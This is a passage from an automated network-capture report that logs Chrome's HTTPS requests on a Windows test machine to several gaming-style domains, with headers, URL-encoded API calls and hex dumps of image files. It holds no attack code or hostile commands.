                                                                                                                                                          Data Ascii: json=pwv|13|ARqMJXJymTHzQwQsX0EwIbBpIvh3Rnf3QNA0LBe2PSVlYvLwDiUcNmbws25mgTUsXjThE0XdHfFdPiDvMhGjNaNyYwArMHRsc2QxJaWpZ0MsXjUvtb5rUTO0fA5mfi5nXVOmCkVxZbKyWjNxYJGypBZtTuIwI0WeF0DhJoNyesUwKgVpRFGlDkkcMXJlYgZzQxUsXjU0aPUdEPFdNSQLJRGwWLOSGvLwZsUcRyGvDbVykt1abxB
                                                                                                                                                          2024-06-09 22:41:17 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:17 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:17 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          2024-06-09 22:41:17 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:17 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:17 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:17 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 31 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 1
                                                                                                                                                          2024-06-09 22:41:17 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:17 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:17 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          483192.168.2.550236103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC662OUTPOST /mt-cloud/api/sn.maintain HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 324
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC324OUTData Raw: 6a 73 6f 6e 3d 25 37 42 25 32 32 69 64 25 32 32 25 33 41 25 32 32 31 37 39 37 32 38 37 34 30 36 33 36 32 31 25 32 32 25 32 43 25 32 32 6a 73 6f 6e 72 70 63 25 32 32 25 33 41 25 32 32 32 2e 30 25 32 32 25 32 43 25 32 32 6d 65 74 68 6f 64 25 32 32 25 33 41 25 32 32 73 6e 2e 6d 61 69 6e 74 61 69 6e 25 32 32 25 32 43 25 32 32 70 61 72 61 6d 73 25 32 32 25 33 41 25 37 42 25 32 32 73 6e 25 32 32 25 33 41 25 32 32 6c 6c 31 32 25 32 32 25 32 43 25 32 32 6d 6f 64 75 6c 65 49 64 25 32 32 25 33 41 25 32 32 25 32 32 25 32 43 25 32 32 74 65 72 6d 69 6e 61 6c 25 32 32 25 33 41 31 25 32 43 25 32 32 68 6f 73 74 25 32 32 25 33 41 25 32 32 6a 73 33 32 36 2e 63 63 25 32 32 25 32 43 25 32 32 66 69 6e 67 65 72 4f 53 4d 6f 64 65 6c 25 32 32 25 33 41 25 32 32 43 68 72 6f 6d 65
                                                                                                                                                          Data Ascii: json=%7B%22id%22%3A%2217972874063621%22%2C%22jsonrpc%22%3A%222.0%22%2C%22method%22%3A%22sn.maintain%22%2C%22params%22%3A%7B%22sn%22%3A%22ll12%22%2C%22moduleId%22%3A%22%22%2C%22terminal%22%3A1%2C%22host%22%3A%22js326.cc%22%2C%22fingerOSModel%22%3A%22Chrome
                                                                                                                                                          2024-06-09 22:41:17 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:17 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:17 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          2024-06-09 22:41:17 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:17 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:17 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:17 UTC37INData Raw: 56 61 72 79 3a 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 0d 0a
                                                                                                                                                          Data Ascii: Vary: Access-Control-Request-Method
                                                                                                                                                          2024-06-09 22:41:17 UTC38INData Raw: 56 61 72 79 3a 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a
                                                                                                                                                          Data Ascii: Vary: Access-Control-Request-Headers
                                                                                                                                                          2024-06-09 22:41:17 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:17 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 31 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 1


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          484192.168.2.550237103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC667OUTPOST /mt-cloud/api/sn.maintain.list HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 303
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC303OUTData Raw: 6a 73 6f 6e 3d 25 37 42 25 32 32 69 64 25 32 32 25 33 41 25 32 32 31 37 39 37 32 38 37 34 30 36 34 31 30 31 25 32 32 25 32 43 25 32 32 6a 73 6f 6e 72 70 63 25 32 32 25 33 41 25 32 32 32 2e 30 25 32 32 25 32 43 25 32 32 6d 65 74 68 6f 64 25 32 32 25 33 41 25 32 32 73 6e 2e 6d 61 69 6e 74 61 69 6e 2e 6c 69 73 74 25 32 32 25 32 43 25 32 32 70 61 72 61 6d 73 25 32 32 25 33 41 25 37 42 25 32 32 73 6e 25 32 32 25 33 41 25 32 32 6c 6c 31 32 25 32 32 25 32 43 25 32 32 74 65 72 6d 69 6e 61 6c 25 32 32 25 33 41 31 25 32 43 25 32 32 68 6f 73 74 25 32 32 25 33 41 25 32 32 6a 73 33 32 36 2e 63 63 25 32 32 25 32 43 25 32 32 66 69 6e 67 65 72 4f 53 4d 6f 64 65 6c 25 32 32 25 33 41 25 32 32 43 68 72 6f 6d 65 25 32 30 31 31 37 2e 30 2e 30 2e 30 25 32 30 25 37 43 25 32 30
                                                                                                                                                          Data Ascii: json=%7B%22id%22%3A%2217972874064101%22%2C%22jsonrpc%22%3A%222.0%22%2C%22method%22%3A%22sn.maintain.list%22%2C%22params%22%3A%7B%22sn%22%3A%22ll12%22%2C%22terminal%22%3A1%2C%22host%22%3A%22js326.cc%22%2C%22fingerOSModel%22%3A%22Chrome%20117.0.0.0%20%7C%20
                                                                                                                                                          2024-06-09 22:41:17 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:17 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:17 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          2024-06-09 22:41:17 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:17 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:17 UTC32INData Raw: 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: access-control-allow-origin: *
                                                                                                                                                          2024-06-09 22:41:17 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 31 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 1
                                                                                                                                                          2024-06-09 22:41:17 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:17 UTC82INData Raw: 78 2d 76 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: x-via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:17 UTC17INData Raw: 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a
                                                                                                                                                          Data Ascii: via: 1.1 google


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          485192.168.2.55025623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:17 UTC655OUTGET /pc/image-pc/index/382/footer/btn_service_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:17 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 3968
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:11 GMT
                                                                                                                                                          ETag: "64c0a207-f80"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE9[3],EU-FRA-paris-GLOBAL1-CACHE11[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473792
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: f9c6596b7b5fd44218b71903600d501f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118208
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:17 UTC3968INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 2d 08 02 00 00 00 88 c6 d6 ee 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                                                                                                                                          Data Ascii: PNGIHDR-tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          486192.168.2.55025890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:17 UTC626OUTGET /fiximg/ac-20200404/fileupload/uy09/202308/202308230603087.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:17 UTC554INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 26796
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE15[3],EU-FRA-paris-GLOBAL1-CACHE5[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467542
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b76392d70e00ab1e66747914a30e88b5
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124458
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:17 UTC15830INData Raw: 75 39 6d 45 50 55 47 69 48 6c 45 6d 54 43 67 74 46 76 45 6e 33 75 59 41 76 4d 4b 45 61 6f 73 48 59 72 4d 75 46 69 56 6c 74 30 4b 44 4c 76 68 6c 73 78 48 6d 44 69 76 31 6d 4c 79 32 63 38 6f 53 2b 65 4d 36 73 79 71 35 6b 39 41 4f 32 39 4c 51 63 31 53 32 42 4c 59 77 47 49 75 35 58 51 32 77 34 34 30 4b 47 4a 7a 46 4a 39 43 39 55 54 45 49 35 38 76 46 35 6d 52 54 79 63 61 4a 57 4c 6b 62 63 62 30 48 56 4f 74 4b 7a 61 39 6e 45 34 6e 72 4c 46 6e 6d 6f 34 47 75 71 61 7a 78 6f 47 73 64 67 46 65 6a 6d 2b 6a 4b 6e 2f 74 4f 77 6a 6f 64 6d 6d 31 6f 50 32 78 6c 37 36 46 59 7a 44 72 45 2f 33 78 76 73 62 51 34 78 45 41 37 73 6c 41 61 4e 48 72 67 41 79 43 38 42 4a 6f 47 34 71 70 52 6c 49 4b 42 4b 34 57 39 36 31 41 66 51 67 41 36 75 41 74 50 4c 30 59 2b 4f 36 30 34 35 4b 50
                                                                                                                                                          Data Ascii: u9mEPUGiHlEmTCgtFvEn3uYAvMKEaosHYrMuFiVlt0KDLvhlsxHmDiv1mLy2c8oS+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkbcb0HVOtKza9nE4nrLFnmo4GuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KP
                                                                                                                                                          2024-06-09 22:41:17 UTC10966INData Raw: 38 50 4b 75 47 4f 65 61 4f 31 39 54 43 65 4c 36 4a 76 53 2f 6b 44 59 65 49 2f 4c 61 6b 46 69 64 50 5a 43 6e 4c 52 69 62 44 57 58 59 4f 35 43 47 7a 36 36 4e 76 75 42 6a 43 74 33 68 59 46 39 6d 56 67 43 6a 6d 32 58 4c 31 4f 65 37 6f 38 53 47 57 39 76 75 70 51 2f 30 46 58 76 71 31 49 70 2f 55 6a 61 37 35 37 6e 4b 6d 37 7a 44 5a 4e 66 49 72 6b 58 4b 51 38 64 36 38 6c 30 36 62 67 5a 78 77 51 43 68 41 42 53 41 41 6a 39 70 74 55 42 6c 30 51 51 6e 41 55 79 46 63 72 45 61 65 31 4f 33 6e 61 55 5a 66 35 36 64 37 38 4c 59 54 70 6a 6d 51 55 69 49 66 43 58 48 4e 73 76 4a 76 33 48 2f 64 30 4a 6a 76 4a 2f 49 4a 37 37 2b 7a 75 76 76 56 38 55 32 6b 71 77 72 51 42 76 69 6a 32 51 2b 61 58 6f 35 72 72 62 6a 66 71 67 6d 48 49 50 71 32 7a 36 47 58 34 52 55 5a 4b 57 72 35 6f 56
                                                                                                                                                          Data Ascii: 8PKuGOeaO19TCeL6JvS/kDYeI/LakFidPZCnLRibDWXYO5CGz66NvuBjCt3hYF9mVgCjm2XL1Oe7o8SGW9vupQ/0FXvq1Ip/Uja757nKm7zDZNfIrkXKQ8d68l06bgZxwQChABSAAj9ptUBl0QQnAUyFcrEae1O3naUZf56d78LYTpjmQUiIfCXHNsvJv3H/d0JjvJ/IJ77+zuvvV8U2kqwrQBvij2Q+aXo5rrbjfqgmHIPq2z6GX4RUZKWr5oV


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          487192.168.2.55025990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:17 UTC635OUTGET /pc/image-pc/video/gd_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:17 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17264
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4370"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[5],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE2[422],EU-GER-frankfurt-GLOBAL1-CACHE12[405,TCP_MISS,419],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ce98a0245edd6cb6549cb831fe33d2cf
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814505
                                                                                                                                                          X-CCDN-Expires: 2464114
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:18 UTC15751INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:18 UTC1513INData Raw: a2 ab c2 cc 46 9c 81 3a a5 2c 49 3c 4b 61 dc 03 06 1c 3b f1 4d 2b b3 2a 91 20 69 8c 70 00 70 0f 8f 79 3c 4f 1e e5 6a f1 cf 79 b8 9f 13 cc 66 ae 71 b6 d9 db eb 7e 65 77 94 93 90 de dd ac 20 e3 ed 32 9b bb b0 63 6c 56 e1 a3 69 24 64 b7 69 66 79 54 b8 89 63 0a 80 6e 34 2b 6d 95 6b 42 22 46 23 40 0c cf 89 8f 19 49 9d bd 4c 00 c1 df 1c 95 fa 3b 8d 2a 32 26 22 47 51 2e ed 80 97 08 87 ff 00 4b 92 71 66 c1 04 c1 f3 6e 0b 63 cb f2 99 63 61 c8 79 1e 36 f7 8a 5c 61 f2 77 57 b2 ad bd ee 57 23 76 9d b9 ae 2e a4 92 e6 f0 5b 23 2b 6d 1d b6 90 80 ab 45 a9 34 b2 6d 2b ce 90 8b c6 24 4c 10 de 98 81 c0 61 17 f9 2a f1 ba a3 1a a6 4d 22 0c 08 2f 9c 89 e3 99 6f 9f 72 98 e0 f3 56 37 79 8e 2f 90 9b 15 2d be 0e cf 87 cd c5 f3 c6 58 94 ed 59 cd d1 32 59 43 24 a4 c8 b1 19 91 97 ba
                                                                                                                                                          Data Ascii: F:,I<Ka;M+* ippy<Ojyfq~ew 2clVi$difyTcn4+mkB"F#@IL;*2&"GQ.Kqfnccay6\awWW#v.[#+mE4m+$La*M"/orV7y/-XY2YC$


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          488192.168.2.55026090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
